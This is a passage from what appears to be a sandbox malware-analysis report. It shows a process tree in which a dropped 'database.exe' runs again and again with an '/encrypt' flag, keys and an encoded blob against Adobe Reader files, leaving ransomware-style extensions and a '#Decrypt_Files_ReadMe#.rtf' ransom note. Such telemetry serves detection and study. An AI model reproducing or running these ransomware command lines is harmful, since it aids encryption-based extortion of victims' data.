                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\logsession.dll"
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:5868
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:4364
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Onix32.dll"
                                                                                                                                                                              5⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:4764
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\reader_sl.exe"
                                                                                                                                                                              5⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:5800
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\rt3d.dll"
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:4456
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:3908
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\sqlite.dll"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:2780
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\vdk150.dll"
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:3944
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.aup"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:6020
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\Gj4uETi2-5J83D24f.[[email protected]]"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:5296
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\#Decrypt_Files_ReadMe#.rtf"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:4172
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\k755tu4E-krPpNGe8.[[email protected]]"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:5164
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\QEhoto9u-15V0a8Mj.[[email protected]]"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:5732
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\JSByteCodeWin.bin.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:1256
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:4708
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:4376
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:5812
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                        PID:2844
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:5828
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:4924
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\HLS.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:2248
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\IA32.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:1784
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\database.exe
